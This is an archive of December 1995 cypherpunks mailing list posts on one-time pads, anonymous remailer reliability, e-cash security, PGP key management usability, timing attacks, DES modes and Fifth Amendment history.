From: "Don M. Kitchen" <don@wero.byu.edu>
Date: Mon, 11 Dec 1995 22:57:21 +0800
To: cypherpunks@toad.com
Subject: [Noise] A vaguely humorous post
Message-ID: <199512111002.DAA00907@wero.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I saw some fool posting to alt.security among other places trying to
get his basic program to do OTP's. On the off chance that anybody
thinks this is funny, here's my response:

In-reply-to: spy@vs.spy's message of 10 Dec 1995 05:02:17 GMT
Newsgroups: alt.2600,alt.2600.programz,alt.security
Followup-To: alt.2600
Subject: Re: HELP....This will not work; I am perplexed.
Reply-to: don@cs.byu.edu
References: <4adpkp$3id@mercury.initco.net>
- --text follows this line--

> 60  INPUT "HOW MANY ONE TIME PADS DO YOU WANT?";NUMB
[snip]
> 160 RANDOMIZE E
> 170 X=INT(RND(0)*90)+1

This isn't sci.crypt so I won't flame, but I feel I should point out
that "One Time Pad" is a registered trademark of Cypherpunks, Ltd, and
that any inferrence that anything coming out of a basic randomizer is
"One", "Time", or "Pad" is a blatent trademark violation.

As a courtesy to the public, Cypherpunks, Ltd, makes freely available it's
patented One Time Pad technology. Using PGP, you may enter the top-secret
activation code thusly: "pgp +makerandom=[size] [filename]" where [size] is the
size, in bytes, of your Cypherpunk[tm]-generated, super-cryptographically-
secure, ultimate One Time Pad[tm], and [filename] is where you want it
stored. You can rest assured that with your cypherpunk[tm] One-Time-Pad[tm],
not even a Cypherpunk[tm] can break your code without breaking your bones.

> **Have you been compromised?  If the answer is no,
>  you had better think again.

With security ideas like that, I'm not surprised. MD5 man, MD5.

PS, try to zip a large output from pgp makerandom. Now try a large output
from basic. Hmmmm. Which one Just Wont Compress[tm]?

Happy Monday everyone.

PS: got mail crypt working, it's awesome. It's quite seamless, up to the
point where my home box doesn't have incoming mail service and EMACS
doesn't have built in POP or IMAP. (Yet).  But great for nntp and PGP.

Don
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMMwBmcLa+QKZS485AQHKLAL6Ah4881dbMan91wNL2TJjvGMHe75Xwzrw
YI0x5/XsmuoYv7M6qn4O+MZ9vEF51ES1sJaW5bOQ5Gq0vJn2bmGVIV+kmbn2p3TZ
ZHxkv51NW7zxwRgyvnezwyYwBrY10bQ2
=eoAc
-----END PGP SIGNATURE-----

-- 
<don@cs.byu.edu>           fRee cRyPTo!   jOin the hUnt or BE tHe PrEY
PGP key - http://students.cs.byu.edu/~don   or PubKey servers (0x994b8f39)
  June 7&14, 1995: 1st amendment repealed.  Junk mail to root@127.0.0.1
* This user insured by the Smith, Wesson, & Zimmermann insurance company *




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 12 Dec 1995 11:35:46 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: [NOISE] Is it possible?
In-Reply-To: <Pine.LNX.3.91.951210113717.31381A-100000@micro.internexus.net>
Message-ID: <199512110846.DAA15037@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Laszlo Vecsey writes:
> How can I be sure that the source has not been modified from the original 
> distribution before it is compiled?

It helps to be Ken Thompson....

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 12 Dec 1995 11:35:26 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: [NOISE] anti-copy
In-Reply-To: <199512101537.KAA04258@detroit.freenet.org>
Message-ID: <199512110852.DAA15235@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Did someone just publish the list address in a newspaper again ?  It seems
to be one of those days....

Daark writes:
> How would it be possible to create files that KNOW they are 
> a copy?  

It's not, to the great dismay of the Software Publishers Association (or 
whatever they're called).

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 12 Dec 1995 11:35:27 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: More elveator problem
In-Reply-To: <199512110720.BAA04212@UNiX.asb.com>
Message-ID: <199512110904.EAA15250@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


The cypherpunk formerly known as Deranged Mutant writes:
> Wait... are unique IDs secret from others? Can they share theirs with
> ea. other without compromising something?
> 
> Maybe using a hash of their combined secret ideas (adding them, or
> mixing the bits... how long is the unique ID?) can be used to generate
> a "key" to exchange other information....

The fundamental problem is that Eve and her sisters get to hear both IDs
when Alice and Bob exchange them. So Eve can also do the hash, XOR, or
whatever. DH skirts this obstacle brilliantly.

-Futplex <futplex@pseudonym.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Tue, 12 Dec 1995 06:48:59 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: More FUD from First Virtual
In-Reply-To: <199512110750.XAA11161@ix2.ix.netcom.com>
Message-ID: <0kn1Q6CMc50e02irtU@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail.limbo: 10-Dec-95 Re: More FUD from First Vir.. Bill
Stewart@ix.netcom.c (1289*)

> At 08:51 AM 12/10/95 -0500, Nathaniel Borenstein <nsb@fv.com> (Tense Hot
> Alien In Barn) wrote:

> >In any event, I could write a virus that sits in
> >front of the e-cash program and steals your keys when next you run the
> >e-cash program.  Software's just too easy to fool.  That's why I regard
> >the risk of catastrophe as being fairly large in software-based e-cash
> >schemes.

> How is this different for an ecash program vs. a First Virtual email
> acknowledgement program, where either a (really hairy) virus, or, 
> more practically, an active email interloper could fake FV acks?  

It's fundamentally different because FV (unlike all the other systems,
to my knowledge) is a "closed loop" financial instrument.  By this I
mean that it doesn't depend on a one-way passage of some kind of
credentials to consummate a transaction.  It would be almost equally
easy to write a keyboard virus that intercepted your FV-ID as it would
be to write one that intercepted your e-cash keys, but then there would
be a pretty significant additional layer for the seamless interception
and response to the confirmation email.  (Note the "seamless" here.  If
you do it in such a way that it interferes with the user's normal mail,
it will be caught pretty quickly.)  Also, the "almost equally easy"
refers to the fact that FV-ID's are free-form text, a very deliberate
design decision that makes them far harder to sniff, even at the
keyboard level,  than credit card numbers (which are self-identifying),
although a good e-cash system will share this quality for its pass
phrases.

> While hardware may be the best encryption solution for the average user
> (as you say, and I think I agree with you), it needs to have some password
> interface such as a small keypad on the front of the smartcard, to prevent
> its usability after theft.

Right, absolutely.  But in this case, a virus still can't fake what's on
the hardware.

> Of course, there are problems with digicash as well; my Digicash play-money
> account thinks it's empty (in spite of having half a dozen coin-looking files),
> and doesn't recognize any of the half-dozen passwords I've guessed I might have
> used with it, so I'm not able to use Sameer's digicash-powered remailer.

And you're a *sophisticated* user, right Bill?  This just underscores
some other comments I've made in the past about Joe Sixpack.  I think
there will be serious usability problems.  -- Nathaniel
--------
Nathaniel Borenstein <nsb@fv.com>       | (Tense Hot Alien In Barn)
Chief Scientist, First Virtual Holdings | VIRTUAL YELLOW RIBBON:
FAQ & PGP key: nsb+faq@nsb.fv.com       | http://www.netresponse.com/zldf




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Tue, 12 Dec 1995 05:33:24 +0800
To: Adam Shostack <ecarp@netcom.com
Subject: Usability of Cryptography (was Re: More FUD from First Virtual)
In-Reply-To: <199512102134.PAA19064@khijol>
Message-ID: <Ikn1ZhGMc50eA2iscn@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail.nonpersonal: 10-Dec-95 Re: More FUD from First Vir..
"Ed Carp"@netcom.com (5360)

>  IMO, taking 
> the complexity out of the key management process will almost 
> certainly lead to designers and programmers making bad decisions 
> about how the process should work

This is exactly right.  In fact, it isn't even just bad programmer
decisions; some of the complexity is really inherently needed for
security.  PGP's notion of who you trust to certify keys, for example,
confuses the heck out of naive users, who want to "trust" anyone they
believe is a good person, not just people they believe are sophisticated
enough to sign keys.  It's really hard to explain to some people why
they should say, "No, I don't trust Grandma."

What a lot of people don't seem to realize is that, in crypto software,
there is a fundamental tradeoff between usability and security.  You can
simplify PGP (or similar software) to the point where it's easy to deal
with key management, but it will then be far more susceptible to
compromise.

Key management is the Achilles heel of crypto-for-the-masses.  I know
there are some people who want to shoot the messenger, and who think
that by stating this fact, I am declaring myself an opponent of
cryptography, but the fact is that my company has been using PGP very
heavily internally for almost 2 years, and we think we've managed our
keys securely, but it has taken a lot of effort and user education.  The
experience has left us more skeptical than ever about secure key
management by and for millions of non-technical customers.
--------
Nathaniel Borenstein <nsb@fv.com>       | (Tense Hot Alien In Barn)
Chief Scientist, First Virtual Holdings | VIRTUAL YELLOW RIBBON:
FAQ & PGP key: nsb+faq@nsb.fv.com       | http://www.netresponse.com/zldf




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 12 Dec 1995 06:04:47 +0800
To: "Joseph M. Reagle Jr." <cypherpunks@toad.com
Subject: Re: .PWL spin
Message-ID: <2.2b8.32.19951211114417.0088297c@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:12 PM 12/9/95 -0500, Joseph M. Reagle Jr. wrote:

>        So now, I don't even bother with that, I'm just hoping securdrv,
>sfs, or something makes it to W95 one of these days... (I doubt either of
>those will make it...)

SecureDrive works under Windows 95 if you disable all 32-bit disk drivers. 

Control Panel
System
Performance
File System
Troubleshooting
Disable all 32 bit protected mode disk drivers

You have to run SECTSR before starting Win95.  A pain but it does work.

I will be working on figuring out how to force Windows 95 to disable 32 bit
access for just my SecureDrive disk alone.  Should be possible.

DCF

"Windows 95 beats having a personal life."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 12 Dec 1995 05:55:39 +0800
To: Frank Stuart <jsw@netscape.com
Subject: Re: Netscape announces position against GAK
Message-ID: <2.2b8.32.19951211114432.00897dec@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 04:59 PM 12/9/95 -0600, Frank Stuart wrote:
>To avoid just saying "me too", I'll throw out another idea on making the U.S.
>version of Netscape available to U.S. users over the Internet.  How about a
>phone number to call to get an access id of some sort that can be used to
>FTP the software. 

As a deep cover agent for Icelandic Intelligence, I wandered down to my
local Babbages this weekend and bought (for cash) a copy of the US version
of the Netscape Browser.  The $6/hour clerk did not ask for my passport (or
birth certificate plus government photo ID).  For Netscape's (and Babbages')
sake, I hope the Feds don't find out.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Tue, 12 Dec 1995 06:23:57 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199512111450.GAA10737@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail, which is available at:
ftp://ftp.csua.berkeley.edu/pub/cypherpunks/premail/premail-0.33a.tar.gz

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@extropia.wimsey.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"bsu-cs"} = "<nowhere@bsu-cs.bsu.edu> cpunk hash ksub";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"ideath"} = "<remailer@ideath.goldenbear.com> cpunk hash ksub reord";
$remailer{"hacktic"} = "<remailer@utopia.hacktic.nl> cpunk mix pgp hash latent cut post ek";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post ek reord";
$remailer{"rahul"} = "<homer@rahul.net> cpunk pgp hash filter";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"syrinx"} = "<syrinx@c2.org> cpunk pgp hash cut reord mix post";
$remailer{"ford"} = "<remailer@bi-node.zerberus.de> cpunk pgp hash ksub";
$remailer{"hroller"} = "<hroller@c2.org> cpunk pgp hash latent ek";
$remailer{"vishnu"} = "<mixmaster@vishnu.alias.net> cpunk mix pgp. hash latent cut ek ksub reord";
$remailer{"robo"} = "<robo@c2.org> cpunk hash mix";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"spook"} = "<remailer@valhalla.phoenix.net> cpunk mix pgp hash latent cut ek reord";
$remailer{"rmadillo"} = "<remailer@armadillo.com> mix cpunk pgp hash latent cut";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"wmono"} = "<wmono@valhalla.phoenix.net> cpunk mix pgp. hash latent cut ek";
$remailer{"shinobi"} = "<remailer@shinobi.alias.net> cpunk mix hash latent cut ek reorder";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ek ksub";
$remailer{"gondolin"} = "<mix@remail.gondolin.org> cpunk mix pgp hash latent cut ek reord";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(robo hroller c2)
(flame hacktic replay)
(wmono spook)
(alumni portal)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Last update: Mon 11 Dec 95 6:49:36 PST
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
portal   hfinney@shell.portal.com         #+*########*      :44  99.85%
hacktic  remailer@utopia.hacktic.nl       ******* ****     7:17  99.72%
c2       remail@c2.org                    *++-.-++ +++    47:37  99.65%
rmadillo remailer@armadillo.com           ++++++++ +++    38:51  99.38%
amnesia  amnesia@chardos.connix.com       -+- -+ +--+   1:55:48  99.36%
flame    remailer@flame.alias.net         * *** * ****    19:31  99.30%
spook    remailer@valhalla.phoenix.net    ..-*  ******    53:58  99.08%
extropia remail@extropia.wimsey.com       ---.- -.---   6:49:13  98.44%
shinobi  remailer@shinobi.alias.net       + --- -- - +    53:31  98.38%
ecafe    cpunk@remail.ecafe.org             ### ##-##      2:18  98.11%
wmono    wmono@valhalla.phoenix.net        *    **  **    12:36  98.07%
mix      mixmaster@remail.obscura.com     .-__ _-__.   27:56:43  97.91%
replay   remailer@replay.com              *   + +** **     5:41  97.69%
gondolin mix@remail.gondolin.org              - --_.-  10:47:46  97.00%
vishnu   mixmaster@vishnu.alias.net        *#**      #     5:26  96.37%
alumni   hal@alumni.caltech.edu             *#     # #     1:20  96.28%
bsu-cs   nowhere@bsu-cs.bsu.edu            ##   #  # #      :15  95.56%
ford     remailer@bi-node.zerberus.de     ---._...--   15:06:29  94.28%
hroller  hroller@c2.org                   ####*+### -#     5:21  94.25%
rahul    homer@rahul.net                  ** +* *+**+*     4:32  99.67%
penet    anon@anon.penet.fi                -    . --   13:10:01  83.74%
robo     robo@c2.org                          #-##         5:59  52.62%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
          Remailer always preserves subject header, even in pgp mode.
          
   latent
          Supports Matt Ghio's Latent-Time: option.
          
   cut
          Supports Matt Ghio's Cutmarks: option.
          
   post
          Post to Usenet using Post-To: or Anon-Post-To: header.
          
   ek
          Encrypt responses in reply blocks using Encrypt-Key: header.
          
   special
          Accepts only pgp encrypted messages.
          
   mix
          Can accept messages in Mixmaster format.
          
   reord
          Attempts to foil traffic analysis by reordering messages. Note:
          I'm relying on the word of the remailer operator here, and
          haven't verified the reord info myself.

   mon
          Remailer has been known to monitor contents of private email.
          
   filter
          Remailer has been known to filter messages based on content. If
          not listed in conjunction with mon, then only messages destined
          for public forums are subject to filtering.
          

Raph Levien




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Tue, 12 Dec 1995 05:10:34 +0800
To: tomw@netscape.com>
Subject: Re: Timing Cryptanalysis Attack
In-Reply-To: <199512110845.JAA25564@utopia.hacktic.nl>
Message-ID: <0kn1kjCMc50e02ivZP@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Hey, don't go for constant time, that's too hard to get perfect.  Add a
*random* delay.  This particular crypto-flaw is pretty easy to fix. 
(See, I'm not *always* arguing the downside of cryptography!)

It is worth noting, however, the extent to which "secure" cryptographic
protocols keep needing to get fixed one last time....  -- Nathaniel
--------
Nathaniel Borenstein <nsb@fv.com>       | (Tense Hot Alien In Barn)
Chief Scientist, First Virtual Holdings | VIRTUAL YELLOW RIBBON:
FAQ & PGP key: nsb+faq@nsb.fv.com       | http://www.netresponse.com/zldf




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Tue, 12 Dec 1995 14:20:43 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: GAK and self-incrimination?
In-Reply-To: <199512110749.XAA11099@ix2.ix.netcom.com>
Message-ID: <Pine.SUN.3.91.951211070718.10531C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 10 Dec 1995, Bill Stewart wrote:

> At 02:57 AM 12/10/95 -0800, you wrote:
> >The Fifth protects you against *compelled* self-incrimination - in
> >particular, the right to be free from the "cruel trilemma" of
> >
> >        o       conviction of a substantive crime, based on your
> >                (true) testimony
> >        o       conviction of perjury, for lying when asked to incriminate
> >                yourself
> >        o       contempt of court sanctions, for refusing to answer
> 
> Testimony was often compelled by more direct means than threatened
> contempt citations.  Piling rocks on people until they talked was
> still in use in the 1600s, unless I've got my dates wrong.

And later.

The term 'pressing a defendant for a plea' came from the practice of 
piling heavy weights on a defendant and 'pressing' him into the very 
floor of the court. (As defendants who did not admit a plea would save 
their family from being held accountable to judgment, the incentive to 
remain silent was high).  Often weight was piled atop the hapless 
defendant until he or she expired, having refused to enter a plea.

> It may have gone out of fashion slightly after witch-burning,
> but was still in recent cultural memory of the Constitution's authors.
> #--
> #				Thanks;  Bill
> # Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com
> # Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281
> 
> 

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nina Yuan <nyuan@husc.harvard.edu>
Date: Tue, 12 Dec 1995 05:14:46 +0800
To: owner-cypherpunks@toad.com (Damaged Justice)
Subject: Re: [NOISE] REQ: "Markov" filter as recently posted in .shar form
In-Reply-To: <199512110127.UAA22346@yakko.cs.wmich.edu>
Message-ID: <199512111332.IAA04497@fas.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Apologies, but I already tried all standard net searches on this. Someone
> recently posted a .shar archive for a program called Markov, which filters
[snip]
> also looked on the archives at hks.net, but had no luck there. If some
> kind person will post it again, I'll give it a home on my page of WWW
> resources. I have the binary, and am impressed and amused enough to keep
> it for regular use.. anyone for alt.usenet.kooks.markov? 
> 
> -- 
> http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information
>  EmmaGoldmanCamillePagliaMarieCurieAynRandSapphoDianaToriAmosPJHarvey&Demona
>    Hate, hate your enemies  save, save your friends  find, find your place
>  I feel a groove comin' on | speak..speak the truth | Freedom...yeah, right.

It was posted by Rich Salz.  In the interest of saving bandwidth, I'll mail
it directly to the requestor, and other interested folks can grab it from
the mentioned home page, FYI.

-nhy
---------------------------------------------------------------------------
Nina H. Yuan    yuan@wjh.harvard.edu   nyuan@fas.harvard.edu  nyuan@bbn.com
"Education is a progressive discovery of our own ignorance."  - Will Durant
---------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin L Prigge <Kevin.L.Prigge-2@cis.umn.edu>
Date: Tue, 12 Dec 1995 05:23:52 +0800
To: cypherpunks@toad.com
Subject: DES Cryptanalysis
Message-ID: <30cc40ff3f57002@noc.cis.umn.edu>
MIME-Version: 1.0
Content-Type: text/plain


I'm looking for pointers, or perhaps an explanation of the statement
I found in Applied Cryptography (section 9.6) where it implies
that if the IV is not unique in CFB mode, the cryptanalyst can recover the
plaintext.

The reason that this interests me is that I have a file, encrypted
with DES in CFB mode. I believe I know the first 8 bytes of plaintext
and I also know the IV used. While it'd be nice to decrypt this
file, I don't know that it'd be worth brute forcing the key, even if
the spare cycles to do it were available. Any pointers to any pertinant
information would be appreciated. Thanks. 


-- 
Kevin L. Prigge        |"A computer lets you make more mistakes faster 
UofM Central Computing | than any invention in human history--with the 
email: klp@umn.edu     | possible exceptions of handguns and tequila."
01001001110101100110001| - Mitch Ratcliffe




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Twain Ecash Support <support@marktwain.com>
Date: Tue, 12 Dec 1995 05:43:51 +0800
To: Sean Donelan <SEAN@SDG.DRA.COM>
Subject: Re: Questions for Mark Twain Banks
Message-ID: <199512111455.IAA08213@admin.starnet.net>
MIME-Version: 1.0
Content-Type: text/plain


At 02:37 AM 12/11/95 -0600, Sean Donelan wrote:
>The St. Louis Internet Users Group is doing a meeting on digital cash
>on Monday, Dec. 11.  Since Mark Twain Banks is located in St. Louis,
>they've been invited to send a few speakers on the topic.

It is probably going to be me...

--Lucky Green

--Mark Twain Bank Ecash Support
  Ecash. The secure Internet payment system that protects your privacy.
  <http://www.marktwain.com/ecash.html>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Tue, 12 Dec 1995 06:50:51 +0800
To: Bill Stewart <stewarts@ix.netcom.com>
Subject: Re: [NOISE] GAK and self-incrimination?
Message-ID: <199512111401.JAA08705@pipe6.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Dec 10, 1995 23:55:13, 'Bill Stewart <stewarts@ix.netcom.com>' wrote: 
 
 
 
> 
>Testimony was often compelled by more direct means than threatened 
>contempt citations.  Piling rocks on people until they talked was 
>still in use in the 1600s, unless I've got my dates wrong. 
>It may have gone out of fashion slightly after witch-burning, 
>but was still in recent cultural memory of the Constitution's authors. 
> 
 
The rock process was called "pressing" and it had an economic basis to it,
if my memory serves. 
 
The laws of the time permitted the state (i.e. often the little village) to
confiscate the property of those convicted of crimes in a court. Remember
that many of the witch etc. accusations were made among the residents of
the same villages with all of the petty resentments, vindictive people, and
"nuts" that exist in every location and every time throughout history. 
 
The legal system did not permit someone to be tried for a crime until they
had entered their plea of guilty or not guilty. In other words, you could
charge them with being a witch. Then you demanded that they enter a plea.
Then you try them, and likely convict them. Then you confiscate their
property. People who reused to enter a plea jammed up the entire process --
no plea = no trial = no verdict = no property confiscation. 
 
To avoid this unpleasant series of equations, the forces bringing the
charges wanted a way of forcing people to plea to the charge. They wanted
it to be reasonably safe, since a person who died passed their property on
to the rest of the family. But they also wanted it to be unpleasant enough
to actually compell the accused to actually enter the plea. 
 
Thus pressing was invented. 
 
Stones were slowly added over a period of days to produce maximum
discomfort with minimal chance of an accidental death. 
 
(Now what does this have to do with strong crypto?) 
 
Well, why would the person charged refuse to plea unless they were guilty?
(Beginning to sound a little familiar?) 
 
Futplex's original post brings up yet another example from history where
human behavior has nothing to do with crime. The person who refused to
plead so refused not out of any sense of guilt but from something entirely
different.  
 
If I'm not guilty why do I want strong crypto? Sometimes for the same
reason I want a shredder.  And why do I want a shredder? Sometimes just to
keep the local gossip from going through my papers after I throw them out. 
 
--tallpaul 
      
     




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Mon, 11 Dec 1995 17:12:49 +0800
To: cypherpunks@toad.com
Subject: Timing Cryptanalysis Attack
Message-ID: <199512110845.JAA25564@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



pck@netcom.com (Paul C. Kocher) writes:

 > I've just released details of an attack many of you will
 > find interesting since quite a few existing cryptography
 > products and systems are potentially at risk.  The general
 > idea of the attack is that secret keys can be found by
 > measuring the amount of time used to to process messages.

I just read this paper, and while it is somewhat interesting, I
don't think the walls of cryptography are in any danger of
crumbling.

People employing systems like PGP are already advised to use them
on private machines, with only one user, and untampered-with
binaries.  Under such circumstances, the collecting of statistics
necessary to employ a timing attack would be difficult at best,
and anyone doing a "black bag" job on the platform would be
better advised to use a direct attack like a passphrase-sniffer
as opposed to a complex statistical approach.

On Networked systems with many users, where one is advised not to
decrypt with or store ones private key, the situation is of
course different.  But again, another user with the ability to
monitor the timing of specific subroutines in ones cryptographic
software or feed that software enough chosen data to generate a
statistical profile of the key, would doubtless have an
opportunity to compromise the system in other ways.

In the particular case of RSA used to sign messages or transmit
session keys, the values being exponentiated are either highly
random or strongly hashed, and the opportunity of an opponent to
time numerical routines with data of his own choosing is
non-existant.

So while this is a very nice piece of work, and certainly of
theoretical interest, I don't think it will modify the way in
which people are advised to utilize cryptographic software, or
cause companies like Netscape of RSADSI to shed any tears.

                                   -Bourbaki 137







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: A&SUser <A&SUser@cctr.umkc.edu>
Date: Tue, 12 Dec 1995 05:35:04 +0800
To: cypherpunks@toad.com
Subject: Pornographic stories
Message-ID: <199512111618.IAA06435@cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


Hey, I'm Molly, and I know I sent you a bit of mail a couple of days ago. 
 I'm not sure how you do your Pornographic server, so I'll just ask 
again.  I know I would be VERY gratful if you could send me any XXX 
stories, I love to read them.  I could reward you over the net somehow 
I'm sure.  
my adress is mphillips@cctr.umkc.edu

Thanks....I'll be waiting.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Tue, 12 Dec 1995 05:09:26 +0800
To: cypherpunks@toad.com
Subject: Re: [Mix-L] WARNING: sting via remailer! (fwd)
In-Reply-To: <DJ5Bun.4Cu@news2.new-york.net>
Message-ID: <Pine.BSF.3.91.951211104124.6709B-100000-100000-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 6 Dec 1995, Mutatis Mutantdis wrote:

> Bryan Strawser <bstrawse@copper.ucs.indiana.edu> wrote:
> 
> >Forwarded message:
> [..]
> >> 	I was in the federal building coffee shop in Reston, Va. yesterday
> >> when I overheard a conversation between what appeared to be two FBI agents
> >> discussing a sting operation involving Mixmaster. Hearing the word
> >> "mixmaster" naturally caused my ears to perk up and I listened further. 
> >> 
> >> 	It appears that the FBI has coerced a mixmaster remailer operator
> >> into cooperating with them in a sting operation to catch remailers when
> >> they forward email pertaining to pornography, pedophilia, and copy-written
> >> software. 
> 
> Not that such a thing is impossible, but it seems awfully suspicious
> that FBI agents would be talking about a case within earshot of the
> general public...


I think you are giving the agents too much credit if you believe that 
they never discuss investigations while having coffee in the Federal 
Building -- or even while having lunch at McDonald's.

While sitting in close proximity to other tables, I've had to shush 
agents who were speaking loudly about a case or investigation...

EBD

>  
> --Mutant Rob
> 
> 
> 

Not a lawyer on the Net, although I play one in real life.
**********************************************************
Flame away! I get treated worse in person every day!!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Daniel Miskell <DMiskell@envirolink.org>
Date: Tue, 12 Dec 1995 04:41:18 +0800
To: s1113645@tesla.cc.uottawa.ca
Subject: Re: The Elevator Problem
Message-ID: <9512111557.AA09207@envirolink.org>
MIME-Version: 1.0
Content-Type: text/plain


Ok, here was the method of key generation i was talking about.  With the light 
communications, the idea was to use photons whose waves pulsed in certain 
directions (up/down, left/right, and diagonally) to create a way toommunicate 
much like morse code.  The key used to scramble these communications was 
designed to change the direction the photons of a message pulsated - like 
changing the characters of a message, scrambling it up.  The key consisted of 
three symbols, one for each of the possible orientations, and was fainly 
simple. It was like a one time pad in that the key was never recycled.

The key could be generated by a game of 20 questions, so to speak.  The people 
at either end randomly generated a key.  Then, they asked eiither indirect 
questions about the contents of one anothers key (do you have an odd number of 
up/down symbols in row x, etc), but since the contents of the key were never 
touched on DIRECTLY, no eavesdfropper could determine the key, and it was 
ttally secure.

We, obviously, cannot use the photon as a method of communication, not for th 
